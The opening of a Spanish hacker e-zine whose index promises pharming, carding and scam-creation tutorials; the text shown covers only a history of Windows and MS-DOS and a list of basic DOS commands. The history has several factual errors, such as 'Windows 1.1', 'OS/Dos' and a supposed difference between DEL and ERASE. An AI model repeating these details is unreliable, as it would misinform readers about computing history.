Bl4ck P0r74l_Ezine

Anuncio
Bl4ck-P0r74l E-ZINE
Staff:
~ Director: Lessiem & Satyricon
~ Diseño de la H-Zine: Lessiem & Satyricon
~ Coordinador: Lessiem & Satyricon
Escritores:
~ Sección Windows: “Historia y Evolucion de Windows” By: Selenity
~ Seccion Linux: “Limpiando Nuestro Linux” By: Lessiem
~ Sección Pharming: “¿Que es Pharming y Como Efectuarlo?” By: Lessiem
~ Sección Nmap: “Que Es Nmap y Tecnicas de Escaneo” By: V4ndid4
~ Sección Programacion: “Sockets en C++” By: [SeC]
~ Sección Carding: “Primeros Pasos Sobre el Carding” By: ic4r0z
~ Sección Hardware: “Introduccion al Mundo de los PIC'S” By: Satyricon
~ Sección Scam's: “Como Crear un Scam” By: Satyricon & Lessiem
~ Sección Hardware: “Metodos de Refrigeracion” By: Satyricon
Bl4ck~P0r74l E-zine esta dedicada a todos aquellos habitantes de la world wide web que quieren aprender
algo fuera de lo normal y a aquellos que alguna vez se preguntaron “¿Como lo hacen?”. Esta dedicada a
todos aquellos VERDADEROS maestros en estas artes a los que le debemos la gran mayoria de lo que
sabemos.
“Lo que sabemos es una gota de agua; lo que ignoramos es el océano”
Isaac Newton
Seccion Windows
By: Selenity
1.0 Aclarando Conceptos
Antes de profundizar en la materia y a sumergirnos en los aspectos más interesantes del conocimiento de este popular
sistema operativo vamos a recapitular unos breves párrafos de información básica que nos ayudaran a comprender que es
realmente Windows para poder continuar después analizando como funciona y se desarrolla.
1.1 ¿Qué es Windows?
Windows es un S.O desarrollado y comercializado por la empresa Microsoft Corporation, empresa dedicada al sector
informático, su creador es Bill Gates.Windows es un sistema closed source.
1.2 ¿De donde procede su nombre y que significa?
El significado etimológico de la palabra Windows es ventanas, dicho nombre le fue asignado basándose en su interfaz
gráfica de usuario (GUI), basada en ventanas. Los sistemas operativos de la familia Windows de Microsoft siempre han
recibido este nombre, ya que aunque han cambiado de apariencia y estructura interna, el funcionamiento básico de sus
principales funciones se ejecuta mediante ventanas de aplicación.
1.3 ¿Quién es Bill Gates?
Es un empresario estadounidense, cofundador de la empresa de software Microsoft productora del sistema operativo para
computadoras personales más utilizado en el mundo, Microsoft Windows.
1.4 ¿Qué significa Closed Source?
Un software o sistema que use closed source, significa que su código fuente no se encuentra disponible para cualquier
usuario, es decir no se hace público. Se le llama así en contraposición al código abierto.
El software no libre utiliza un código cerrado. Por su calidad de secreto industrial, su divulgación constituye un delito.
Esto lo que quiere decir es que para liberar el código fuente necesario para la utilización de este tipo de aplicaciones se
requiere una clave que se adquiere por medio de licencia previo pago de una tasa establecida por la compañía creadora del
software, en el caso de Windows será la empresa Microsoft Corporation quien fije el precio de la licencia de uso del
programa mediante la cual en función de los requisitos establecidos en el contrato nos dará acceso a todas las
actualizaciones.
La distribución de licencias por medios tales como la copia o reduplicación (mas conocidas como copias piratas) o su
libre distribución sin la previa autorización de sus creadores incurren un delito establecido en el código penal porque
atenta contra la ley de protección de la propiedad intelectual.
Esta es una de las principales características que distancia y desmarca a Windows de otros proyectos de software que
están adquiriendo consistencia en el mercado informático y de la ingeniería de software, creaciones como GNU Linux
son proyectos de código abierto y de libre distribución entre sus usuarios que obtienen todos los accesos y actualizaciones
de forma gratuita.
La rápida expansión del denominado “software libre” ha conseguido que continuamente se sumen desarrolladores y
programadores de software a la causa, consiguiendo productos de calidad excepcional que nada tienen que envidiar a las
empresas privadas del sector, por lo que el desarrollo de programas y aplicaciones de código libre es cada día mayor y
esto hace que se superen mas fácilmente barreras iniciales como la compatibilidad de un software libre con diferentes
aplicaciones del mercado, puesto que los fabricantes desean ampliar su catalogo de ofertas ,por lo que cada vez son mas
,los que incluyen versiones de sus productos compatibles con software de libre distribución.
Esta es una de las principales causas por las que Microsoft esta dejando de escalar puestos en las principales posiciones
del ranking que había monopolizado durante mucho tiempo .Mientras que su competencia de código abierto Linux gana
adeptos entre los usuarios ,situación que ha puesto en jaque en reiteradas ocasiones al gigante de Microsoft.
1.5 Mirando al futuro… ¿Es posible un Windows open source?
Si nos basamos en la historiografía de Windows esto seria prácticamente imposible, puesto que Microsoft siempre se ha
caracterizado por la privatización de su software y de acaparar siempre un elevado porcentaje en la industria informática
por lo que amenudo se le ha tachado de monopolista, si a ello sumamos la incesante lucha que mantienen contra la
piratería y la elevada cantidad de recursos que emplea anualmente para combatirla, la simple idea de la posibilidad de
que Microsoft decida abrir el código de Windows libremente para los usuarios resultaría simplemente inverosímil. Aun
así las nuevas tecnologías de las información se caracterizan por una constate innovación de los proyectos realizados y
por una competencia extrema, algo que obliga constantemente a las compañías a desarrollar su creatividad de mercado y
evaluar sus estrategias de marketing con nuevas proyecciones que les ayuden a mantenerse entre los primeros puestos ,es
por ese motivo que la trayectoria de Microsoft hasta ahora ha sido unidireccional, es decir, sin apreciables cambios en sus
gestiones de ventas ,teniendo en cuenta que su mayor competidor ha sido siempre el gigante Apple, distribuidora de la
serie de ordenadores Macintosh (mas conocidos como Mac)empresa, cuya producción de software también es privada y
que además es fabricante de su propio hardware de computación. Pero valorando la imparable expansión de software
libre, la gran aceptación de los usuarios hacia este tipo de productos y la perdida de liderazgo de Microsoft, no solo en un
sistema como operativo como Windows ,sino en un gran numero de aplicaciones de software cuyo monopolio siempre le
había pertenecido como podrían ser ejemplo de ello El navegador Web firefox de Mozilla (una organización sin ánimo de
lucro que produce software libre) este navegador ha desbancado completamente al hasta ahora insustituible Internet
Explorer, aplicación integrada por defecto en el paquete Windows , convirtiéndole así en uno de los navegadores
preferidos por los internautas, otro ejemplo de ello seria la polifacética suite de oficina open office, que incluye toda una
serie de herramientas funcionales y utilidades similares al la alternativa de siempre Microsoft office ,que se adquiere
como paquete adicional para complementar Windows, mientras que open office es gratuita y compatible con todas las
plataformas. Todas estas circunstancias adicionales crean una situación de puede obligar a Microsoft y a otros grandes de
la industria a plantearse un giro de 180º en el desarrollo y comercialización de sus productos para continuar siendo
competitivos. Abrirse a este libre mercado podría suponer una fuente inagotable de recursos en los que el beneficio seria
reciproco, por un lado la industria ampliaría el abanico de posibilidades de elección entre los usuarios que podrían
seleccionar libremente el tipo de software que mas se adapte a sus necesidades ya que las tasas y la privatización
condicionan en gran medida la elección de muchas personas al escoger un producto frente a la libre distribución de
productos de calidad competentes en el mercado, además de esto, se mejoraría el catalogo de ofertas complementándose
así con una gran marca añadiendo años de experiencia ,valoración y aceptación de un gran numero de usuarios. Por
supuesto Microsoft también obtendría un beneficio ganancial de esta propicia situación ya que al abrir su código muchos
desarrolladores y programadores de software libre se sumarian a su equipo de trabajo aportando ideas innovadoras y
renovando el enfoque y la creatividad, factores imprescindibles en el éxito de una empresa, porque una de las razones que
han logrado la popularización de este tipo de software además de su libre distribución han sido las ideas y la innovación
empleadas en su desarrollo creando cosas hasta ahora nunca vistas, una perspectiva que parece haberse atrofiado en
Microsoft durante el largo periodo que ha permanecido indestronable.
Analizando esta reflexión probablemente ahora muchos penséis que la distribución de un Windows libre en el futuro
pueda dejar de ser una utopia y convertirse en una realidad, por supuesto que Microsoft no va a “liberalizarse” por
completo, eso más que una utopia seria un milagro. Puesto que cada compañía establece las directrices de su construcción
en unas bases que no serán modificadas a no ser que cambiasen los patrones generales como por ejemplo fuese absorbida
por otra empresa, algo que teniendo en cuenta su patrimonio me parece poco probable. Lo que si podemos tener claro es
que en este juego el que no innova muere o mejor dicho lo matan y que esa “muerte comercial” es algo que Microsoft
jamás podría consentir pues atentaría contra el imperio que ha consolidado durante años. De modo que si para seguir
siendo competitivo tiene que abrir el código de Windows lo hará inevitablemente, aunque conociendo a Microsoft
siempre puede crear un segundo sistema operativo u una versión especial de Windows que siga siendo privada, algo así
como una versión de Windows que sea “Premium Edition” con mas funciones y complementos ,en cualquier caso
tenemos que ser optimistas porque el continuo proceso de evolución en el que se encuentran inmersas las ciencias de la
información es sin duda productivo para todos tanto si Microsoft quiere unirse al carro del desarrollo como si no ,no
debemos olvidar que las personas que trabajan para la ciencia contribuyen al desarrollo de la misma pero realmente es la
ciencia la que debe trabajar para las personas que son los indudables contribuyentes a su mejora y los utilitarios de sus
funcionalidades por lo que nada en el mundo resulta tan expectante como la idea de que en un futuro la información y la
tecnología fueses libres y accesibles para todo el mundo y que episodios como la privatización de software ,las
restricciones al acceso de la información o la censura de contenidos sean solamente un capitulo cerrado en la historia de
la evolución y el desarrollo de la información.
2.0 Un Poco De Historia......
Vamos a hacer un repaso por la historiografía de Windows desde el lanzamiento de su primera versión hasta la actualidad
comprendiendo y analizando las mejoras y pormenores que han ido confeccionando este sistema operativo durante
décadas, por lo que vamos a centrarnos únicamente en las más representativas y que han añadido mejoras consistentes
que contribuyeron a mejorar el formato.
2.1 Los orígenes
En 1985 Microsoft publicó la primera versión de Windows, Windows 1.1 una interfaz gráfica de usuario (GUI) para su
propio sistema operativo (MS-DOS) que había sido incluido en el IBM PC y ordenadores compatibles desde 1981.
La primera versión de Microsoft Windows Premium nunca fue demasiado potente ni tampoco se hizo popular. Estaba
severamente limitada debido a los recursos legales de Apple, que no permitía imitaciones de sus interfaces de usuario. Por
ejemplo, las ventanas sólo podían disponerse en mosaico sobre la pantalla; esto es, nunca podían solaparse u ocultarse
unas a otras. Tampoco había "papelera de reciclaje" debido a que Apple creía que ellos tenían la patente de este
paradigma o concepto. Ambas limitaciones fueron eliminadas cuando el recurso de Apple fue rechazado en los tribunales.
Windows 2.0 Apareció en 1987, y fue un poco más popular que la versión inicial. Gran parte de esta popularidad la
obtuvo de la inclusión en forma de versión "Run-time" de nuevas aplicaciones gráficas de Microsoft, Microsoft Excel y
Microsoft Word para Windows.
Windows 3.0 La primera versión realmente popular de Windows fue la versión 3.0, publicada en 1990. Ésta se benefició
de las mejoradas capacidades gráficas para PC de esta época, y también del microprocesador 80386, que permitía mejoras
en las capacidades multitarea de las aplicaciones Windows. Esto permitiría ejecutar en modo multitarea viejas
aplicaciones basadas en MS-DOS. Windows 3 convirtió al IBM PC en un serio competidor para el Apple Macintosh.
Hasta aquí acabamos de comprobar los intentos de Microsoft por hacerse con el mercado internacional y de la rivalidad
con Apple, empresa que ya comenzada apuntando maneras en el sector. Pero como en toda evolución y lanzamiento de
una idea su éxito depende de la capacidad de sus creadores de sortear obstáculos tales como la rivalidad comercial y la
competencia de mercado, de modo que antes de haber prosperado tiene que crearse un punto de inflexión que propicia
este desarrollo, normalmente suele darse un cúmulo de circunstancias que desencadenadas de manera apropiada se
convierten en factores indispensables para sobreponerse a las dificultades del proyecto aprovechando las ocasiones de
demanda y anteponiendo un gran despliegue de recursos dispuestos a satisfacer las necesidades de los usuarios. De modo
que esto fue lo que precisamente supo aprovechar Microsoft encontrándose en el sitio adecuado en el momento justo las
circunstancias que lo impulsaron: una plataforma de software en expansión, una gigantesca demanda de software de
ejecución mediante una interfaz grafica intuitiva ya que la gente no terminaba de familiarizarse con las líneas de
comandos de los antecesores a Windows y por supuesto la liberalización de patentes como hemos visto anteriormente
que permitieron a Microsoft elaborar patrones similares a aplicaciones exitosas que se encontraban ya en el mercado.
Todos estos factores contribuyeron en gran medida a la elaboración, desarrollo y lanzamiento de la plataforma Windows,
pero como en toda creación también tuvieron su punto de inflexión que le ayudaron a alcanzar el éxito. Para comprender
esto voy a realizar una síntesis de la información que he recopilado de Wikipedia sobre el proyecto OS/Dos, un sistema
operativo de IBM que intentó suceder a DOS como sistema operativo de los PC. Se desarrolló inicialmente de manera
conjunta entre Microsoft e IBM, algo que dio a Microsoft autonomía para continuar con la expansión de Windows ya que
después de la creación de OS/DOS continuaron desarrollando Windows 3.0 mientras que IBM por su parte también
continuo el sistema OS/DOS en solitario. Si bien no fue relevante esta fusión, si contribuyo a la idea de desarrollo de
Windows como sistema operativo único y genérico y es muy probable que los resquicios iniciales de la simbiosis de OS/
DOS y Windows resultasen los pilares fundamentales de la evolución de aquel primitivo Windows a la plataforma
consolidada que es actualmente.
2.2 Datos sobre OS/2
Durante la segunda mitad de los 80, Microsoft e IBM habían estado desarrollando conjuntamente OS/2 como sucesor del
DOS, para sacar el máximo provecho a las capacidades del procesador Intel 80286. OS/2 utilizaba el direccionamiento
hardware de memoria disponible en el Intel 80286 para poder utilizar hasta 16 MB de memoria. La mayoría de los
programas de DOS estaban por el contrario limitados a 640 KB de memoria. OS/2 1.x también soportaba memoria virtual
y multitarea.
A principio de los 90, crecieron las tensiones en la relación entre IBM y Microsoft. Cooperaban entre sí en el desarrollo
de sus sistemas operativos para PC y cada uno tenía acceso al código del otro. Microsoft quería desarrollar Windows aún
más, mientras IBM deseaba que el futuro trabajo estuviera basado en OS/2.
IBM publicó OS/2 versión 2.0 en 1992. Esta versión suponía un gran avance frente a OS/2 1.3. Incorporaba un nuevo
sistema de ventanas orientado a objetos llamado Workplace Shell como sustituto del Presentación Manager, un nuevo
sistema de ficheros, HPFS, para reemplazar al sistema de ficheros FAT de DOS usado también en Windows y
aprovechaba todas las ventajas de las capacidades de 32 bit del procesador Intel 80386.
IBM continuó vendiendo OS/2, produciendo versiones posteriores como OS/2 3.0 (también llamado Warp) y 4.0 (Merlín).
Pero con la llegada de Windows 95, OS/2 comenzó a perder cuota de mercado. Aunque OS/2 seguía corriendo
aplicaciones de Windows 3.0, carecía de soporte para las nuevas aplicaciones que requerían Windows 95. Al contrario
que con Windows 3.0, IBM no tenía acceso al código fuente de Windows 95; y tampoco tenía el tiempo ni los recursos
necesarios para emular el trabajo de los programadores de Microsoft con Windows 95; no obstante, OS/2 3.0 (Warp)
apareció en el mercado antes que Windows 95 (que se retrasaba respecto a la fecha inicial de lanzamiento); como mejoras
incorporaba una reducción en los requisitos de hardware. Lamentablemente, el posterior abandono por parte de IBM hizo
que fuese quedando relegado.
A partir de aquí comienza el verdadero despliegue de Windows después de la desvinculación de Microsoft en el proyecto
OS/Dos añadiendo mejoras de desarrollo a su proyecto inicial y empleando todos los recursos posibles para posicionar a
Windows en los puestos mas altos de la industria del software. Vamos a repasar ahora las versiones más significativas de
Windows sus respectivas características.
2.3 Principales versiones de Windows
Windows 3.1 y Windows 3.11 En respuesta a la aparición de OS/2 0, Microsoft desarrolló Windows 3.1, que incluía
diversas pequeñas mejoras a Windows 3.0 (como las fuentes escalables TrueType), pero que consistía principalmente en
soporte multimedia. Más tarde Microsoft publicó el Windows 3.11 (denominado Windows para trabajo en grupo), que
incluía controladores y protocolos mejorados para las comunicaciones en red y soporte para redes punto a punto.
Windows NT Siendo un sistema operativo completamente nuevo, Windows NT sufrió problemas de compatibilidad con
el hardware y el software existentes. También necesitaba gran cantidad de recursos y éstos estaban solamente disponibles
en equipos grandes y caros. Debido a esto muchos usuarios no pudieron pasarse a Windows NT. La interfaz gráfica de NT
todavía estaba basada en la de Windows 3.1 que era inferior a la Workplace Shell de OS/2.
Windows 95 Windows 95 tenía dos grandes ventajas para el consumidor medio. Primero, aunque su interfaz todavía
corría sobre MS-DOS, tenía una instalación integrada que le hacía aparecer como un solo sistema operativo (ya no se
necesitaba comprar MS-DOS e instalar Windows encima). Segundo, introducía un subsistema en modo protegido que
estaba especialmente escrito a procesadores 80386 o superiores, lo cual impediría que las nuevas aplicaciones Win32
dañaran el área de memoria de otras aplicaciones Win32.
Windows 98 El 25 de junio de 1998 llegó Windows 98. Incluía nuevos controladores de hardware y el sistema de
ficheros FAT32 (también soportado por Windows 95 OSR 2 y OSR 2.5) que soportaba particiones mayores a los 2 GB
permitidos por Windows 95. Dio soporte también a las nuevas tecnologías como DVD, FireWire, USB o AGP. Era
novedosa también la integración del explorador de Internet en todos los ámbitos del sistema.
Windows Millenium Edition (ME) En 2000 Microsoft introdujo Windows ME, que era una copia de Windows 98 con
más aplicaciones añadidas. Windows ME fue un proyecto rápido de un año para rellenar el hueco entre Windows 98 y el
nuevo Windows XP, y eso se notó mucho en la poca estabilidad de esta versión. En teoría, Windows 2000 iba a ser la
unificación entre las dos familias de Windows, la empresarial y la de hogar, pero por retrasos se lanzó este pequeño
avance. En esta versión se aceleraba el inicio del sistema y oficialmente ya no se podía distinguir entre el MS-DOS y el
entorno gráfico.
Windows 2000 En este mismo año vio la luz Windows 2000, una nueva versión de Windows NT muy útil para los
administradores de sistemas y con una gran cantidad de servicios de red y lo más importante: admitía dispositivos
Plug&Play que venían siendo un problema con Windows NT. La familia de Windows 2000 estaba formada por varias
versiones del sistema: una para las estaciones de trabajo (Windows 2000 Professional) y varias para servidores (Windows
2000 Server, Advanced Server, Datacenter Server).Windows 2000 incorporaba importantes innovaciones tecnológicas
para entornos Microsoft, tanto en nuevos servicios como en la mejora de los existentes.
Windows XP La unión de Windows NT/2000 y la familia de Windows 9.x se alcanzó con Windows XP puesto en venta
en 2001 en su versión Home y Professional. Windows XP usa el núcleo de Windows NT. Incorpora una nueva interfaz y
hace alarde de mayores capacidades multimedia. Además dispone de otras novedades como la multitarea mejorada,
soporte para redes inalámbricas y asistencia remota..
Windows Vista Windows Vista apareció en el mercado el 30 de enero de 2007. Cabe destacar los continuos retrasos en
las fechas de entrega del sistema operativo. Este sistema operativo, como el Windows ME, ha sido criticado por su falta
de compatibilidad, entre otras cosas, haciendo que la mayoría de los usuarios regresen a su antecesor Windows XP o
migrar a Mac OS X o GNU/Linux.
Windows 7 Es la siguiente versión de Windows actualmente en Beta, la cual es sucesora a Windows Vista. Algunas
fuentes indican que Windows 7 se terminará de desarrollar a finales de 2009.A pesar de los rumores recientes de que
Windows 7 saldría a la venta en 2009, las últimas declaraciones de Bill Gates vuelven a poner como fecha de salida de
este nuevo sistema operativo para 2010, estando disponible en 2009 una versión para Betatesters, y no para el usuario
final.
2.4 Regresiones en el proceso evolutivo.
Debemos ser conscientes que cualquier prototipo que se aproxime a la perfección requiere de un proceso evolutivo para
superar las imperfecciones surgidas durante su desarrollo ya que es la única manera de pulir este procedimiento para
conseguir algo bueno de un proyecto aceptable y transformarlo luego en algo mejor. Por lo que a menudo la única forma
de obtener los mejores resultados en una creación es en el desarrollo de algo imperfecto que solo pueda perfeccionarse
reelaborando el mismo proyecto una y otra vez hasta completar un ciclo de mejoras, solo que en ocasiones este método no
siempre parece ser garantía de éxito y esta puede ser la dinámica de trabajo de Microsoft ya que han conseguido llegar a
millones de usuarios a través la creación de un proyecto consolidado en base a el perfeccionamiento de proyectos no
desarrollados .Algo que en reiteradas ocasiones comprobando el historial de Windows ha sido una premisa constante en la
comercialización de este sistema ya que para el lanzamiento de una versión final y perfeccionada, se ha tenido que
recopilar previamente el trabajo de las versiones no desarrolladas en el mercado para poder recabar la experiencia de los
usuarios que han posibilitado la corrección de errores como Bugs en la seguridad, compatibilidades de hardware y
software etc. Esto, además de las características mencionadas anteriormente en cada una de las versiones ayudaría a
explicar porque algunas versiones de este sistema operativo han sido exitosas y otras caerán inevitablemente en el
olvido .Ejemplo de ello seria la versión NT, un primer intento de Microsoft de salir de la interfaz grafica del 3.1 y dar un
nuevo enfoque en los recursos y aplicaciones a lo que posteriormente seria el Windows 95 para posteriormente
transformarse en 98 una versión, estable ,funcional y completamente desarrollada. Una replica de esta situación podemos
observarla en el sucesor de Windows 98 , Windows ME ha quedado comprobada su función era simplemente de
transición entre Windows 98 y Windows 2000 a la que Microsoft dio un giro a la plataforma incorporando numerosas
innovaciones a lo que seria mas tarde el proyecto final ,Windows XP ,la versión mas estable desde Windows 98 y que
todavía conserva un gran porcentaje de usuarios que lo prefieren a versiones supuestamente mas desarrolladas como
Windows vista, que ha presentado numerosos problemas de compatibilidad seguridad y funcionalidad dejando patente que
su única misión es desarrollar Windows XP al que finalmente parece ser el desarrollo final de la ultima versión Windows
7 que según Microsoft promete mejorar su interfaz para hacerla más amigable al usuario, con nuevas características que
permitirán hacer tareas de una manera más fácil y rápida, al mismo tiempo en que se realizan esfuerzos para lograr un
sistema más ligero, estable y rápido.
3.0 El Eslabon Perdido: Rebuscando En La Genealogia De Windows
No podríamos continuar nuestra travesía por Windows de ninguna manera sin detenernos en MS-DOS parte sin duda
fundamental para el nacimiento de Windows y su posterior desarrollo. Si Windows tuviese un árbol genealógico MSDos seria el más antiguo de sus ancestros, algo equivalente al neandertal en nuestra especie, un prototipo anclado en el
pasado pero imprescindible en la evolución de Windows incluso permanece integrado en el aunque de forma no visible.
3.1 ¿Que es MS-DOS?
MS-DOS son las siglas de Microsoft Disk Operating System, Sistema operativo de disco de Microsoft. Es un sistema
operativo comercializado por Microsoft perteneciente a la familia DOS. Fue un sistema operativo para el IBM PC que
alcanzó gran difusión.
3.2 Un breve repaso por su historia.
Para conocerlo mejor vamos a hacer un breve repaso de su evolución recopilando información extraída de Wikipedia
sobre el historial de sus versiones con las modificaciones y mejoras que se han ido aplicando sobre ellas.
•
•
•
•
•
•
•
•
•
PC DOS 1.0 - Liberado en 1981 como complemento al IBM-PC. Primera versión de DOS. Soporta 16 Kb de
memoria RAM, disquetes de 5,25 pulgadas de una sola cara de 160 Kb. 22 ordres. Permite archivos con extensión
.com. y .exe. Incorpora el intérprete de comandos COMMAND.COM.
PC DOS 1.1 - Corregidos muchos errores, soporta disquetes de doble densidad 1.25 - Primera versión liberada
con el nombre MS-DOS.
MS-DOS 2.0 - Complemento del IBM XT liberado en 1983. Más del doble de nuevos comandos, soporte de disco
duro (muy pequeño, alrededor de 5 MB).
PC DOS 2.1 - Complemento del IBM PCjr. Añadidas algunas mejoras.
MS-DOS 2.11 - Añadido soporte para otros idiomas (aparte del inglés).
MS-DOS 2.25 - Versión con un mejor soporte para juegos de caracteres de los idiomas japonés y coreano.
MS-DOS 3.0 - Diseñado para soportar el nuevo hardware del IBM AT. Añadidas unas pocas características de
LAN.
MS-DOS 3.1 - Añadidas más características y soporte LAN.
MS-DOS 3.2 - Añadida capacidad para disquetes de 3,5 pulgadas y 720 KB.
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
PC DOS 3.3 - Añadido soporte para el ordenador PS/2 de IBM y los nuevos disquetes de 3,5 pulgadas de alta
capacidad (1,44 MB). Nuevas páginas de código de caracteres internacionales añadidas, con soporte para 17
países.
MS-DOS 3.3 - Capacidad para crear particiones de disco superiores a 32 MB. Soporte de 4 puertos serie (antes
sólo 2). Incorporación de la ordeer "Files" para poder abrir hasta 255 archivos simultáneamente.
MS-DOS 4.0 - Generado con el código fuente de IBM, no con el de Microsoft.
PC DOS 4.0 - Agregado DOS Shell, algunas mejoras y arreglos.
MS-DOS 4.01 - Versión para corregir algún error.
MS-DOS 5.0 - Implementado en 1991, incluyendo más características de administración de memoria y
herramientas para soporte de macros, mejora del intérprete de órdenes o shell.
MS-DOS 6.0 - Liberado en 1993, incluye soporte para Microsoft Windows, utilidades como Defrag
(desfragmentación del disco), DoubleSpace (compresión de archivos), MSBackup (copias de seguridad), MSAV
(Microsoft Anti-Virus), MemMaker, etc.
MS-DOS 6.2 - Versión para corregir errores.
MS-DOS 6.21 - Eliminado el soporte de compresión de disco DoubleSpace.
PC DOS 6.3 - Liberado en abril de 1994.
MS-DOS 6.22 - Última versión distribuida por separado. Incluido DriveSpace para sustituir a DoubleSpace.
PC DOS 7.0 - Añade Stacker para reemplazar a DoubleSpace.
MS-DOS 7.0 - Distribuido junto con Windows 95. Incluye soporte para nombres de archivo largos (hasta ahora
habían tenido la restricción del 8+3).
MS-DOS 7.1 - Integrado en Windows 95 OSR2 y posteriormente en Windows 98 y 98 SE. Soporta sistemas de
archivos FAT32.
MS-DOS 8.0 - Incluido en Windows Me. Es la última versión de MS-DOS.
PC DOS 2000 - Versión que soluciona el problema del año 2000.
3.2 La importancia de MS-DOS: No lo vemos pero continúa estando ahí.
Ahora que ya hemos comprobado que es MS-DOS, su evolución y la importancia que ha tenido en Windows es
importante conocer los aspectos básicos de su funcionamiento porque aunque habitualmente no usemos MS-DOS en
modo directo sigue estando latente en Windows de hecho, todas y cada una de las aplicaciones que ejecutamos en
Windows pueden realizarse a través del dos, utilizando únicamente el símbolo del sistema c:\ e incluso podemos resolver
problemas con el cuando Windows se satura, lo que denominamos comúnmente “quedarse colgado” El funcionamiento
primitivo de MS-DOS se desarrolla a través de las líneas de comandos, que son una combinación de códigos que nos
abren el acceso a cada una de las aplicaciones del sistema, pero para ello debemos conocer esas combinaciones de
caracteres y resulta de gran utilidad memorizar las mas importantes.
3.3 Al principio solo fueron las líneas de comandos.
Uno de los motivos mas importantes que influyeron a Microsoft dar un giro en el desarrollo de sus sistema operativo fue
precisamente la forma de uso del DOS, ya que para conocer todos los entresijos del sistema operativo y tener un dominio
completo sobre su funcionalidad era necesario manipular una gran lista de comandos y múltiples combinaciones entre si,
cosa que resultaba bastante tediosa para un usuario de nivel básico, o quienes únicamente buscaban en el PC un modo de
entretenimiento ,pues se sentían poco atraídos por una interfaz pobre y un complejo funcionamiento. De esta demanda
precisamente nació Windows para que fuese mas comercial y atractivo se le añadió soporte multimedia, funciones de red,
una interfaz grafica atractiva e intuitiva mediante la cual los comandos se ejecutaban a través de las ventanas sin que el
usuario tuviera que memorizarlo….Todo ello le dio a Windows un enfoque novedoso, atractivo y desde luego mucho mas
practico que su antecesor MS-DOS, algo que se aprecio de forma inmediata en el mercado informático, siendo esta
básicamente la esencia de su éxito. No obstante, no debemos olvidar que en pocas palabras y si elimináramos las
aplicaciones extras y demás componentes usados en la creación de Windows citados anteriormente, la esencia sigue
siendo MS-DOS que continua trabajando silenciosamente en los ordenadores de todo el mundo sin que mucha gente se
percate de que sigue estando ahí, y que podemos usarlo cuando queramos.
3.4 Los comandos más importantes.
Dada la importancia de MS-DOS en nuestro sistema, me parece relevante recopilar una lista con la ayuda de la
información extraída de Wikipedia de los comandos genéricos mas importantes y útiles que podemos usar en Dos, para
poder usar las secuencia de comandos debemos arrancar antes MS-DOS, esto lo podemos hacer de un modo directo, que
seria arrancar el ordenador directamente con el símbolo del sistema C:\ para ello en el momento que se reinicie el PC
debemos de pulsar la tecla que nos permita el acceso al menú de arranque del sistema ,normalmente suele ser la tecla F8,a
continuación seleccionaremos la opción “arrancar usando el símbolo del sistema”.
También podemos acceder al Dos de forma indirecta a través de Windows usando la ruta, Inicio >Todos los programas
>accesorios >símbolo del sistema.
Una vez dentro, ya tenemos vía libre para ejecutar a través de las líneas de comandos las diferentes aplicaciones que
queramos utilizar en ese momento, este seria un listado de las más importantes a ejecutar para el dominio de las funciones
principales.
Comandos internos
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
CD o CHDIR - Cambia el directorio actual.
o CD nombre_directorio Cambia al directorio jerárquicamente inferior.
o CD \ Cambia directamente al directorio raíz.
CLS - Borra la pantalla y regresa el cursor a la esquina superior izquierda .
COPY - Copia archivos.
o COPY CON - Copia a un archivo el texto tecleado hasta pulsar Ctrl-Z.
DATE - Cambia o visualiza la fecha del sistema.
DEL o ERASE - Borra un archivo. Siempre y cuando el archivo no se oculte en un fichero. DEL borra el
contenido del archivo y ERASE el archivo en si.
DIR - Muestra una lista con los archivos y directorios (carpetas) que se encuentran en un directorio del disco.
ECHO - Muestra un texto especificado en la pantalla.
o ECHO OFF - Oculta el eco de los comandos ejecutados. Nota: se escribe como línea de código, en los
archivos de proceso por lotes (.bat) y no en la línea del prompt.
EXIT - Sale de una sesión de MS-DOS.
MD o MKDIR - Crea un nuevo directorio.
PATH - Específica trayectorias, en las cuales el sistema operativo busca archivos ejecutables. Es un comando que
se suele escribir en el Config.sys y en archivos de procesos por lotes.
PROMPT- Cambia la línea de visualización de la orden.
RD o RMDIR - Borra un directorio que esté totalmente vacío.
REM - Permite insertar comentarios en archivos de proceso por lotes.
REN o RENAME - Renombra archivos y directorios.
SET - Asigna valores a variables de entorno.
TIME - Visualiza o cambia la hora del reloj interno.
TYPE - Muestra el contenido de un fichero. Se utiliza, principalmente, para ver contenidos de ficheros en formato
texto.
VER - Muestra la versión del Sistema Operativo.
VOL - Muestra la etiqueta del disco duro y su volumen (si lo tiene)
Comandos externos
•
ATTRIB - Sin parámetros, visualiza los atributos de los directorios y archivos. Con parámetros, cambia los
atributos de directorios y archivos.
Los atributos de los directorios, y los ficheros son: de lectura (r), de escritura (w), de archivo (a), oculto (h), de sistema
(s). Parámetros: signos (más o menos) y letras r, w, a, y h "v". Ejemplo: Attrib +r *.* (atributo de sólo lectura, para todos
los ficheros de ese directorio)
•
APPEND - Sirve para especificar trayectorias para ficheros de datos.
•
•
•
•
•
•
•
BACKUP - Ejecuta una copia de seguridad de uno o más archivos de un disco duro a un disquete.
CHKDSK - Verifica si hay errores en el disco duro. (También se puede utilizar para corregirlos con el paramentro
"/F")
DELTREE - Borra un directorio sin importar que contenga subdirectorios con todos sus contenidos.
DISKCOPY - Permite hacer una copia idéntica de un disquete a otro, pertenece al grupo de las órdenes externas.
DOSKEY - Permite mantener residentes en memoria RAM las órdenes que han sido ejecutadas en el punto
indicativo.
FC - Compara ficheros.
FORMAT - Permite crear la estructura lógica, en una unidad física de almacenamiento (discos duros, disquetes y
unidades de almacenamiento masivo).
o /s: Crea un diskette de arranque del sistema, en una unidad.
o /q: Crea un formato rápido, del diskette.
o /u: Formatea de forma incondicional.
o /f: xxx: Formatea especificando el tipo de disquete (ejemplos /f:720 ó /f:1.44)
Se pueden utilizar estos parámetros combinados.
•
•
•
•
•
•
KEYB - Establece el idioma del teclado según el parámetro adicionado (Ejemplo: KEYB SP para el teclado
español).
LABEL - Muestra o cambia la etiqueta de la unidad de disco duro.
MEM - Muestra la memoria RAM, el espacio ocupado y el espacio libre.
MOVE - Mueve o cambia de posición un directorio y/o ficheros. También renombra subdirectorios.
SUBST - Crea una unidad lógica virtual a partir de un directorio.
TREE - Presenta en forma gráfica la estructura de un directorio.
Redireccionamientos
•
•
•
< - Re direccionamiento de la entrada estándar. Su sintaxis es comando < fichero.
> - Re direccionamiento de la salida estándar. Su sintaxis es comando > fichero.
